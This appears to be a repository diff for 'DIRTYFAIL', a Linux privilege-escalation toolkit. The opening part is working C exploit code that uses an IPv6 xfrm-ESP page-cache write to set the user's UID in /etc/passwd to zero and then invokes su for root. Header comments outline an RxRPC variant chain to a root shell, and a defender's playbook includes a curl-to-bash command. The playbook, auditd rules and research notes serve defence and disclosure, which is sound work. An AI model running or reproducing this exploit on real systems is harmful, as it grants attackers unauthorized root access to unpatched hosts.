if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' not 4 chars", uid_str);
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) { log_bad("inner: netlink xfrm: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("inner: bind netlink: %s", strerror(errno));
close(nl); return DF_EXPLOIT_FAIL;
}
if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_EXPLOIT_FAIL;
}
log_ok("inner: v6 XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store_v6(uid_off)) { close(nl); return DF_EXPLOIT_FAIL; }
log_ok("inner: v6 ESP-in-UDP trigger fired at uid_off=%lld", (long long)uid_off);
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
/* OUTER (init ns): prompts → fork bypass child → wait → verify → su. */
df_result_t dirtyfrag_esp6_exploit(bool do_shell)
{
log_step("Dirty Frag (IPv6 xfrm-ESP) — exploit");
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root in init namespace — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to run xfrm-ESP6 page-cache write against /etc/passwd");
log_warn("over ::1 with %d-byte padding to clear xfrm6_input size gate",
V6_PAD_BYTES);
if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; }
if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; }
setenv("DIRTYFAIL_INNER_MODE", "esp6", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, MARKER, 4) != 0) {
log_bad("v6 write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0 (via v6 path)", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe used by `--scan --active`.
*
* Same shape as the v4 active probe: registers an SA in a fresh
* userns and fires the trigger against a sentinel /tmp file. The
* parent re-reads the sentinel and looks for the marker.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp6_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("active-probe v6: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
if (!bring_lo_up_v6()) {
log_bad("active-probe v6: bring lo up: %s", strerror(errno));
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("active-probe v6: netlink xfrm: %s", strerror(errno));
return DF_TEST_ERROR;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("active-probe v6: bind netlink: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_TEST_ERROR;
}
/* Splice from sentinel offset 0; we don't need uid_off math here. */
if (!trigger_store_v6_at(sentinel, 0)) {
close(nl); return DF_TEST_ERROR;
}
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t dirtyfrag_esp6_active_probe(void)
{
char tmpl[] = "/tmp/dirtyfail-esp6-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("probe v6 mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "esp6-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("active-probe v6 inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_warn("ACTIVE PROBE v6: STORE landed at offset %d → kernel is VULNERABLE", i);
return DF_VULNERABLE;
}
}
log_ok("ACTIVE PROBE v6: page intact — kernel esp6 path appears patched");
return DF_OK;
}
+46
View File
@@ -0,0 +1,46 @@
/*
* DIRTYFAIL dirtyfrag_esp6.h
*
* IPv6 dual of the xfrm-ESP page-cache write (CVE-2026-43284).
*
* `esp6_input()` carries the same `if (!skb_has_frag_list(skb)) goto
* skip_cow` branch as `esp_input()`. The mainline patch
* f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 covers BOTH v4 and v6,
* but some distro backports may have shipped only the v4 fix
* particularly when they cherry-picked the ipv4 patch in isolation.
*
* A vulnerable system in the wild may therefore be:
* - patched on v4, vulnerable on v6
* - patched on v6, vulnerable on v4
* - vulnerable on both
*
* This module is the v6 detector + exploit. Differences from the v4
* path:
* - AF_INET6 sockets, ::1 source/dest, sockaddr_in6
* - XFRM SA registered with family=AF_INET6 and 16-byte addresses
* - ESP packet padded to >= 48 bytes total to clear the
* `xfrm6_input.c` size gate (which v4 does not have)
*/
#ifndef DIRTYFAIL_DIRTYFRAG_ESP6_H
#define DIRTYFAIL_DIRTYFRAG_ESP6_H
#include "common.h"
df_result_t dirtyfrag_esp6_detect(void);
/* OUTER (init ns): prompts → fork → wait → verify → su.
* INNER (bypass userns): SA reg + trigger only. */
df_result_t dirtyfrag_esp6_exploit(bool do_shell);
df_result_t dirtyfrag_esp6_exploit_inner(void);
/* Active probe: fires the v6 ESP-in-UDP trigger against a /tmp sentinel
* file (never /etc/passwd) and reports whether the marker landed.
* Used by `--scan --active`. Returns DF_VULNERABLE on marker hit, DF_OK
* if the kernel is patched (no STORE), DF_PRECOND_FAIL if AA-blocked.
* The inner half runs in the bypass userns and reads
* DIRTYFAIL_PROBE_SENTINEL for the target path. */
df_result_t dirtyfrag_esp6_active_probe(void);
df_result_t dirtyfrag_esp6_active_probe_inner(void);
#endif
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,34 @@
/*
* DIRTYFAIL dirtyfrag_rxrpc.h
*
* RxRPC variant of Dirty Frag (CVE-2026-43500).
*/
#ifndef DIRTYFAIL_DIRTYFRAG_RXRPC_H
#define DIRTYFAIL_DIRTYFRAG_RXRPC_H
#include "common.h"
/* Precondition probe: kernel + rxrpc.ko + AF_RXRPC openable. */
df_result_t dirtyfrag_rxrpc_detect(void);
/* Real PoC: brute-force three rxkad session keys K_A, K_B, K_C such
* that pcbc(fcrypt)-decrypting /etc/passwd line 1 at offsets 4/6/8
* with last-write-wins produces "root::0:0:GGGGGG:/root:/bin/bash".
* Then enter a fresh user/net namespace, run the three forged-handshake
* splice triggers, and (if do_shell) execve `su -` to drop a root shell
* via PAM `pam_unix nullok`. */
df_result_t dirtyfrag_rxrpc_exploit(bool do_shell);
df_result_t dirtyfrag_rxrpc_exploit_inner(void);
/* Active probe: fires ONE rxkad handshake-forgery trigger against a
* /tmp sentinel (never /etc/passwd). The trigger writes ~8 bytes of
* pcbc(fcrypt)-decrypted ciphertext into the sentinel page; we don't
* need to predict what landed any byte change confirms the kernel
* STORE happened. Skips fcrypt brute force entirely (a random 8-byte
* key is fine for a structural probe). Returns DF_VULNERABLE if the
* sentinel changed, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */
df_result_t dirtyfrag_rxrpc_active_probe(void);
df_result_t dirtyfrag_rxrpc_active_probe_inner(void);
#endif
+244
View File
@@ -0,0 +1,244 @@
# DIRTYFAIL — defender's playbook
A one-page operational guide for sysadmins assessing and mitigating
exposure to the Copy Fail and Dirty Frag CVE family on Linux hosts.
If you're operating a fleet of Linux servers, the questions below are
the ones to answer in order.
---
## 1. Am I vulnerable?
**Quickest answer (no compilation):**
```bash
curl -sSL https://raw.githubusercontent.com/KaraZajac/DIRTYFAIL/main/tools/dirtyfail-check.sh \
| bash
```
(Read the script first if you don't trust me — it's ~150 lines of
plain bash, no curl-pipe-bash voodoo. Read-only on your system.)
Exit code: `0` mitigated, `1` vulnerable, `2` couldn't determine.
**Empirical answer (builds the C tool, runs the active probes):**
```bash
git clone https://github.com/KaraZajac/DIRTYFAIL.git
cd DIRTYFAIL && make
./dirtyfail --scan --active
```
The default `--scan` mode runs precondition checks (kernel version,
module presence, LSM state) plus an active probe of the Copy Fail
primitive against a sentinel file in `/tmp`. Adding `--active` extends
the sentinel-STORE probe to the other four primitives (ESP v4, ESP v6,
RxRPC, GCM) — this is the only way to distinguish a backported-patched
kernel from an unpatched one without running the full exploit. The
probes only modify temporary files in `/tmp`; `/etc/passwd` is never
touched.
**Per-CVE breakdown (manual checks):**
| Question | Command | Vulnerable if |
|---|---|---|
| Is the algif_aead module reachable? | `lsmod \| grep algif_aead` + `grep algif_aead /etc/modprobe.d/*` | Loaded AND not blacklisted |
| Are esp4/esp6 modules reachable? | `modinfo esp4 esp6` | Both present, not blacklisted |
| Is rxrpc reachable? | `lsmod \| grep rxrpc` + `getsockopt(AF_RXRPC, ...)` | Module loadable from unprivileged context |
| Is unprivileged userns hardened? | `cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns` | Returns `0` or file absent |
| Does PAM accept empty passwords? | `grep nullok /etc/pam.d/common-auth` | "nullok" present without "nullok_secure" |
---
## 2. How do I mitigate?
Three options, listed best-to-worst:
### A. Apply the upstream kernel patch (best)
The fix is mainline commit `f4c50a4034e6` (merged 2026-05-07). Each
distro's kernel package is on its own backport timeline:
| Distro | Status (as of 2026-05-09) |
|---|---|
| Debian 13 (`6.12.86+deb13`) | ✅ patched |
| Ubuntu 24.04 LTS | ❌ not yet patched (kernel 6.8.0-111) |
| Ubuntu 26.04 LTS | ❌ not yet patched (kernel 7.0.0-15.15, predates upstream merge) |
| AlmaLinux 10.1 | ❌ not yet patched (kernel 6.12 EL) |
| Fedora 44 | ❌ not yet patched (kernel 6.19.10) |
Run `apt list --upgradable linux-image-*` / `dnf check-update kernel`
periodically and apply.
### B. Layered LSM mitigation (Ubuntu 26.04 model)
If you're on Ubuntu 24.04 or 26.04, you can replicate Ubuntu 26.04's
defense-in-depth approach without waiting for the kernel patch:
```bash
# 1. Block unprivileged user namespaces from acquiring caps
echo 'kernel.apparmor_restrict_unprivileged_userns = 1' \
| sudo tee /etc/sysctl.d/99-userns-restrict.conf
sudo sysctl --system
# 2. Verify the AA hardening is in effect:
sudo unshare -U -r bash -c 'echo deny > /proc/self/setgroups 2>&1' \
|| echo "OK: unprivileged userns has no caps (mitigation working)"
```
This blocks the EXPLOIT INFRASTRUCTURE (no caps in unprivileged
userns), not the underlying kernel bug. Real-root exploitation still
works.
### C. Module blacklist (`dirtyfail --mitigate` or manual)
Heaviest hammer — blacklists every module that hosts a primitive.
**Side effects: breaks IPsec, AFS, and any userspace using `AF_ALG`
AEAD.**
Automated:
```bash
sudo ./dirtyfail --mitigate
```
Manual equivalent:
```bash
sudo tee /etc/modprobe.d/dirtyfail-mitigations.conf <<'EOF'
install algif_aead /bin/false
install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
EOF
sudo rmmod algif_aead esp4 esp6 rxrpc 2>/dev/null
sudo sysctl vm.drop_caches=3
```
Undo: `sudo ./dirtyfail --cleanup-mitigate` (or delete the conf
files, then `sudo modprobe <name>` to reload as needed).
### D. Disable `pam_unix nullok`
Optional belt-and-suspenders: even if a page-cache STORE lands, the
exploit relies on PAM's `nullok` flag to convert "empty password
field in /etc/passwd" into a successful `su`. Removing `nullok` from
`/etc/pam.d/common-auth` (Debian/Ubuntu) or `/etc/pam.d/system-auth`
(Red Hat family) closes that step:
```bash
sudo sed -i 's/\bnullok\b//g' /etc/pam.d/common-auth # Debian/Ubuntu
# Verify a passworded user can still log in normally before logging out!
```
---
## 3. What should I monitor?
Even after mitigation, the kernel bug remains until the patch lands.
For detection:
### auditd rules (universal)
A ready-to-load rules file ships in `tools/99-dirtyfail.rules`. It
covers six syscall paths used by the exploit chain: XFRM netlink,
add_key(rxrpc), unshare(CLONE_NEWUSER), AF_ALG socket creation,
AppArmor `change_onexec` writes, and direct `/etc/passwd`/`/etc/shadow`
modifications.
```bash
sudo install -m 0640 tools/99-dirtyfail.rules /etc/audit/rules.d/
sudo augenrules --load
sudo systemctl restart auditd
```
Search for events:
```bash
# grep is more reliable than ausearch on distros that use ENRICHED
# log_format (Debian 13, Fedora 44 — ausearch -k can return "no matches"
# even when SYSCALL events with the key are present in the file).
sudo grep -E 'type=SYSCALL.*key="dirtyfail-' /var/log/audit/audit.log | tail -20
# Or per-key, only the most recent entries:
sudo grep 'key="dirtyfail-xfrm"' /var/log/audit/audit.log | tail -5
sudo grep 'key="dirtyfail-rxkey"' /var/log/audit/audit.log | tail -5
sudo grep 'key="dirtyfail-userns"' /var/log/audit/audit.log | tail -5
sudo grep 'key="dirtyfail-afalg"' /var/log/audit/audit.log | tail -5
```
(`sudo ausearch -k <key>` is the documented tool for this and works on
older distros, but enriched-format compat issues mean `grep` is the
safer default.)
The `dirtyfail-userns` rule fires on every legitimate `unshare -U` and
rootless container start — pair it with `dirtyfail-xfrm` in a SIEM
correlation rule (same auid, both within ~5s) for a high-fidelity
alert. Tuning notes inline in the rules file.
### eBPF / falco (if you have it)
Falco's `Sensitive mount opened for writing` and `Detect outbound
connections to common miner pool ports` rule sets won't help directly,
but a custom rule on `unshare(CLONE_NEWUSER)` followed by
`sendto(SOCK_RAW, NETLINK_XFRM)` from a non-zero uid is high-fidelity.
### Cheap log signal
```bash
# Hits if our exploit's marker bytes show up in /etc/passwd's page cache
# (run periodically; doesn't catch every variant but is zero-cost)
grep -E '^[^:]+::0:0:|^[^:]+:x:0000:' /etc/passwd
```
---
## 4. Quick reference card
```
SCAN this host:
curl ... | bash # bash check (no compile)
./dirtyfail --scan # preconds + Copy Fail probe (~1s)
./dirtyfail --scan --active # all 5 sentinel-STORE probes (~10s)
./dirtyfail --scan --active --json # same, machine-readable for SIEM
MITIGATE (Ubuntu / fleet-wide):
sudo ./dirtyfail --mitigate # one-shot defensive deployment
sudo ./dirtyfail --cleanup-mitigate # undo
MITIGATE (manual, no DIRTYFAIL):
See section 2-C above.
PATCH:
apt list --upgradable | grep linux-image
dnf check-update kernel
MONITOR:
/etc/audit/rules.d/99-dirtyfail.rules (see section 3)
EMERGENCY (suspected compromise via this CVE class):
sudo sysctl vm.drop_caches=3 # evicts page-cache exploits
sudo systemctl restart sshd # forces re-read of /etc/passwd
grep dirtyfail /etc/passwd # check for backdoor user
rm -f /var/tmp/.dirtyfail.state # clean DIRTYFAIL state file
```
---
## 5. Glossary
- **Page-cache write**: kernel writes attacker-controlled bytes into the
in-memory copy of a file (`/etc/passwd`, `/usr/bin/su`) without
modifying the file on disk. Persists in RAM until eviction.
- **PAM nullok**: configuration flag that permits authentication for
accounts with an empty password field in `/etc/passwd` (or
`/etc/shadow`).
- **xfrm-ESP**: the kernel's ESP (Encapsulating Security Payload)
implementation in the IPsec stack. The bug class affects in-place
AEAD decrypt over splice-pinned page-cache pages.
- **Userns capability stripping**: kernel-level enforcement that
unprivileged user namespaces have no `CAP_NET_ADMIN` /
`CAP_SYS_ADMIN`, blocking exploit infrastructure even when the
underlying kernel bug is unpatched.
+324
View File
@@ -0,0 +1,324 @@
# DIRTYFAIL — research notes
This document captures kernel-source audits and analysis adjacent to
the published CVEs (CVE-2026-31431 / CVE-2026-43284 / CVE-2026-43500).
It's a living research log, not a vendor advisory: findings here are
based on reading mainline kernel source and the disclosed write-ups,
and may need re-verification as the kernel evolves.
---
## §1. Adjacent kernel paths — audit for the same skb_cow_data() bypass pattern
### TL;DR
Ten kernel paths beyond the published CVEs were audited for the
same in-place-AEAD-over-splice-pinned-pages bug class. **All ten
are structurally immune.** No undisclosed CVE candidates surfaced
in this audit; the bug class is genuinely tightly scoped to the
three published sinks plus the algif_aead authencesn/rfc4106-gcm
primitives.
### The vulnerable pattern
The CVE-2026-43284-class bug requires all four of:
1. **In-place AEAD**`aead_request_set_crypt(req, src, dst, ...)`
where `src == dst` or the scatterlists alias the same memory.
2. **Conditional skip-COW** — input handler has a branch that bypasses
`skb_cow_data()` on certain skb shapes (typically: non-linear with
no frag_list).
3. **`skb_to_sgvec` over skb frags** — the scatterlist passed to the
AEAD is built directly from the skb's frags, so splice-pinned page
references end up in it.
4. **Userspace path to the skb's frags**`splice(2)`, `sendfile(2)`,
or `sendmsg(MSG_SPLICE_PAGES)` can deliver attacker-controlled
page-cache pages into those frags.
Removing any one of the four breaks the chain. The published CVEs are
the three sinks where all four conditions align (esp_input, esp6_input,
rxkad_verify_packet_1) plus the algif_aead authencesn / rfc4106-gcm
primitives that share the in-place destination scatterlist pattern.
### §1.1 Path-by-path verdict
| Path | In-place crypto? | skb_cow_data | Splice-reachable? | Verdict |
|---|---|---|---|---|
| esp_input (esp4) | ✅ | conditional skip | yes | **CVE-2026-43284** (patched) |
| esp6_input | ✅ | conditional skip | yes | **CVE-2026-43284 v6** (patched) |
| algif_aead authencesn | ✅ | n/a (different path) | yes via splice→AF_ALG | **CVE-2026-31431** (patched) |
| algif_aead rfc4106-gcm | ✅ | n/a | yes | **Copy Fail GCM variant** (patched as side-effect of CF revert) |
| rxkad_verify_packet_1 | ✅ | conditional skip | yes via RxRPC handshake | **CVE-2026-43500** (NOT patched as of 2026-05-09) |
| **ah_input (ah4 + ah6)** | ✅ (HMAC, not decrypt) | **UNCONDITIONAL** | n/a | NOT vulnerable — structurally immune |
| **ipcomp_input** | ❌ (decompress, separate output pages) | conditional skip | n/a (output is fresh page) | NOT vulnerable — separate dst |
| **macsec_decrypt** | ✅ | **UNCONDITIONAL** | no — rx skbs come from netdev | NOT vulnerable — structurally immune |
| **tls_sw recv decrypt** | ✅ | unconditional, also rx-only | no — rx skbs come from TCP rx ring | NOT vulnerable |
| **tls_sw send encrypt + MSG_SPLICE_PAGES** | YES (read-only on user pages) | n/a (msg_en allocated separately) | yes (msg_pl) but only as src | NOT vulnerable — separate src/dst |
| **WireGuard `decrypt_packet`** | ✅ ChaCha20Poly1305 in-place | **UNCONDITIONAL** at line 252 | yes via UDP rx (but COW protects) | NOT vulnerable — structurally immune |
| **algif_skcipher `_skcipher_recvmsg`** | ✅ symmetric in-place possible | n/a (different module structure) | src yes (TX SGL), dst no (recv iovec) | NOT vulnerable — separate src/dst |
| **espintcp** (ESP-in-TCP) | n/a (delegates) | n/a | reaches esp_input via xfrm_rcv_encap | inherits f4c50a4034e6 patch — NOT a new CVE |
| **OpenVPN kernel offload `ovpn_aead_decrypt`** | ✅ AEAD in-place | **UNCONDITIONAL** at line 210 | yes via UDP rx (but COW protects) | NOT vulnerable — structurally immune |
| **SCTP-AUTH `sctp_auth_calculate_hmac`** | HMAC only (no decrypt, no destination write into skb data frags) | n/a | n/a — digest writes to auth chunk header (kernel-allocated), not data frags | NOT vulnerable — read-only over data |
### §1.2 Eliminated paths — why each is immune
**`ah_input` (net/ipv4/ah4.c, net/ipv6/ah6.c)** — IPsec Authentication
Header. Calls `skb_cow_data(skb, 0, &trailer)` UNCONDITIONALLY before
`skb_to_sgvec_nomark` builds the HMAC scatterlist. No skip-cow branch.
Splice-pinned pages would always be copied into a private buffer
before HMAC verification.
**`xfrm_ipcomp.c`** — IPCOMP decompression has a conditional skip-cow
branch, but the output is allocated as a fresh kernel page
(`alloc_page(GFP_ATOMIC)`) and the destination scatterlist `dsg` is
built separately from the input scatterlist `sg`. Even with
splice-pinned input pages, decompression output goes to fresh pages.
Not in-place over input.
**`macsec_decrypt` (drivers/net/macsec.c)** — MACsec receive AEAD.
Calls `skb_cow_data(skb, 0, &trailer)` unconditionally before
`skb_to_sgvec` and the in-place decrypt. Additionally: macsec rx
skbs come from netdev rx, not from userspace splice — the attacker
has no path to plant a page-cache page reference.
**`tls_sw_recvmsg` (net/tls/tls_sw.c)** — kTLS receive AEAD.
kernel.org docs: "To decrypt 'in place' kTLS calls skb_cow_data()."
COW is unconditional on the rx path. Additionally: TLS rx skbs come
from the TCP rx queue, not from splice — the only way a user can put
a page-cache page reference into a TCP rx skb is via rare
`SO_PEEK_OFF` / `MSG_PEEK` paths or kernel-side socket forwarding,
neither of which gives the attacker control.
### §1.3 kTLS send via MSG_SPLICE_PAGES — closest near-miss
The kTLS *send* path was modified in 2023 ("splice, net: Handle
MSG_SPLICE_PAGES in AF_TLS", LWN 933386) to support
`MSG_SPLICE_PAGES`, which is the same primitive Dirty Frag and Copy
Fail abuse. This was the most plausible adjacent candidate.
**Resolved: not vulnerable.** Direct reading of `net/tls/tls_sw.c`:
- `tls_sw_sendmsg_splice()` adds the user's spliced pages to `msg_pl`
(the plaintext sk_msg buffer) via `sk_msg_page_add()`.
- `tls_alloc_encrypted_msg()` calls
`sk_msg_alloc(sk, msg_en, len, 0)`**fresh kernel pages** for the
encrypted buffer.
- `tls_push_record()` chains the scatterlists:
```c
sg_chain(rec->sg_aead_out, 2, &msg_en->sg.data[i]);
```
- `tls_do_encryption()`:
```c
aead_request_set_crypt(aead_req, rec->sg_aead_in,
rec->sg_aead_out, data_len, rec->iv_data);
```
- `sg_aead_in` (chained from msg_pl, contains user's spliced page)
`sg_aead_out` (chained from msg_en, kernel-allocated pages).
The encrypt READS the user's spliced /etc/passwd page but WRITES
ciphertext to `msg_en`'s kernel-allocated pages. The user's
page-cache page is never modified. This is exactly the defense the
algif_aead patch (a664bf3d603d) implemented when it reverted to
out-of-place AEAD; kTLS has had it from inception.
Compare to the vulnerable `esp_input` pattern:
```c
/* vulnerable: src == dst */
skb_to_sgvec(skb, sg, ...);
aead_request_set_crypt(req, sg, sg, ...);
```
```c
/* safe: src ≠ dst */
sg_chain(sg_aead_in, ..., msg_pl); /* user spliced pages */
sg_chain(sg_aead_out, ..., msg_en); /* kernel private pages */
aead_request_set_crypt(req, sg_aead_in, sg_aead_out, ...);
```
### §1.3a WireGuard receive — `decrypt_packet()`
ChaCha20Poly1305 in-place AEAD on incoming UDP skbs. Confirmed
**not vulnerable** — `drivers/net/wireguard/receive.c:232277`:
```c
static bool decrypt_packet(struct sk_buff *skb, struct noise_keypair *keypair)
{
struct scatterlist sg[MAX_SKB_FRAGS + 8];
/* ... */
offset = -skb_network_offset(skb);
skb_push(skb, offset);
num_frags = skb_cow_data(skb, 0, &trailer); /* line 252, UNCONDITIONAL */
/* ... */
sg_init_table(sg, num_frags);
if (skb_to_sgvec(skb, sg, 0, skb->len) <= 0)
return false;
if (!chacha20poly1305_decrypt_sg_inplace(sg, skb->len, NULL, 0,
PACKET_CB(skb)->nonce,
keypair->receiving.key))
return false;
```
`skb_cow_data` at line 252 is UNCONDITIONAL — no skip-cow branch. By
the time the in-place AEAD runs, any splice-pinned pages have already
been copied into kernel-private pages. Same defensive pattern as
AH, MACsec, kTLS rx.
### §1.3b algif_skcipher — `_skcipher_recvmsg()`
The companion module to algif_aead, exposing symmetric ciphers
(AES-CBC, AES-CTR, etc.) over AF_ALG. Same author and patchset era
as the in-place optimization that introduced Copy Fail (2017,
72548b093ee3); the Copy Fail upstream fix only reverted algif_aead,
so worth verifying algif_skcipher independently.
`crypto/algif_skcipher.c:151152`:
```c
skcipher_request_set_crypt(&areq->cra_u.skcipher_req, areq->tsgl,
areq->first_rsgl.sgl.sgt.sgl, len, ctx->iv);
```
- `areq->tsgl` = TX SGL, populated via `af_alg_pull_tsgl()`. CAN
contain user-spliced page-cache pages (sendmsg + splice path).
- `areq->first_rsgl.sgl.sgt.sgl` = RX SGL, populated via
`af_alg_get_rsgl(sk, msg, ...)` from the user's `recv()` iovec,
via `iov_iter_get_pages` mapping the calling process's anonymous
memory.
The cipher operation reads from `tsgl` (potentially user-spliced
page-cache pages) and writes to `rsgl` (user's recv buffer in their
own anonymous memory). **src ≠ dst; output never lands on
splice-pinned page-cache pages.**
Why this differs from algif_aead's Copy Fail: the algif_aead bug was
specifically about the `authencesn` template internally chaining TAG
pages into the destination SGL extension (`req->dst` extends past
the end of `req->src`'s last page into chained tag pages, which
happen to be the source's spliced pages). Plain skcipher has no AEAD
tags, no chained scratch — clean src/dst separation. **Not
vulnerable.**
### §1.3c espintcp — IPsec ESP over TCP
`net/xfrm/espintcp.c` is a *transport-layer wrapper* — it does no
cryptographic work itself. The `handle_esp()` function delegates
straight to `xfrm6_rcv_encap` / `xfrm4_rcv_encap`, which call into
the standard `esp_input()` / `esp6_input()` handlers. Any skb that
reaches the ESP path through espintcp is processed by the same code
that was patched by f4c50a4034e6 (SKBFL_SHARED_FRAG check).
**Verdict: not a separate CVE.** On unpatched kernels, espintcp is
just an alternative transport for the existing CVE-2026-43284 sink
(esp_input). On patched kernels the same fix covers both UDP and TCP
encapsulation. The SHARED_FRAG flag is set wherever splice can plant
pages into TCP send buffers, and the producer-side flagging
propagates through TCP into the espintcp path.
### §1.3d OpenVPN kernel offload — `ovpn_aead_decrypt()`
New module in 6.16+ implementing OpenVPN's data channel
(ChaCha20Poly1305 / AES-GCM) in the kernel. Receive AEAD path is in
`drivers/net/ovpn/crypto_aead.c`:
```c
/* line ~210 */
nfrags = skb_cow_data(skb, 0, &trailer); /* UNCONDITIONAL */
/* ... */
/* line ~228 */
skb_to_sgvec_nomark(skb, sg + 1, payload_offset, payload_len);
/* ... */
/* line ~239 */
aead_request_set_crypt(req, sg, sg, payload_len + tag_size, iv);
```
In-place AEAD (`sg, sg`) — but `skb_cow_data()` is called
unconditionally before `skb_to_sgvec_nomark` builds the scatterlist.
Splice-pinned pages always copied to kernel-private memory before
the AEAD runs. **Not vulnerable.** Same defensive pattern as
WireGuard, AH, MACsec, kTLS rx.
### §1.3e SCTP-AUTH HMAC validation
`net/sctp/auth.c:sctp_auth_calculate_hmac()` (lines 606642) computes
HMAC over an SCTP AUTH chunk:
```c
data_len = skb_tail_pointer(skb) - (unsigned char *)auth;
digest = (u8 *)(&auth->auth_hdr + 1);
hmac_sha1_usingrawkey(asoc_key->data, asoc_key->len,
(const u8 *)auth, data_len, digest);
```
The HMAC is computed READ-ONLY over the skb's chunk data. The
digest output is written to the auth chunk's digest field
(`&auth->auth_hdr + 1`), which on the SEND path lives in
kernel-allocated chunk header memory — not in any user-spliced
data fragment. On the RECEIVE path, verification computes HMAC
over received data and compares to the sender-provided digest in a
private buffer — pure read.
The bug class requires a kernel-side WRITE to a splice-pinned page;
SCTP-AUTH only ever READS from skb data and writes the digest to a
kernel-allocated chunk header. **Not vulnerable.**
### §1.4 The protective patterns that distinguish safe from vulnerable
Every safe path on the list achieves immunity through one of three
mechanisms, each of which removes one of the four required conditions:
1. **Unconditional `skb_cow_data()`** before any in-place crypto —
AH, MACsec, kTLS rx. (Removes condition 2.)
2. **Separate destination scatterlist** allocated from kernel-private
pages — kTLS tx, IPCOMP, post-patch algif_aead.
(Removes condition 1.)
3. **The in-place crypto target is fundamentally not a splice-able
skb** — kTLS rx skbs come from TCP rx, not user splice.
(Removes condition 4.)
### §1.5 Out-of-scope or low-value candidates
The candidates that remained after §1.3a-e were all eliminated as
not worth a deeper audit:
- **AF_SMC encryption** — uses kTLS/ULP underneath, already covered
by the kTLS audit (§1.3 / §1.4b).
- **io_uring crypto extensions** — would inherit AF_ALG semantics,
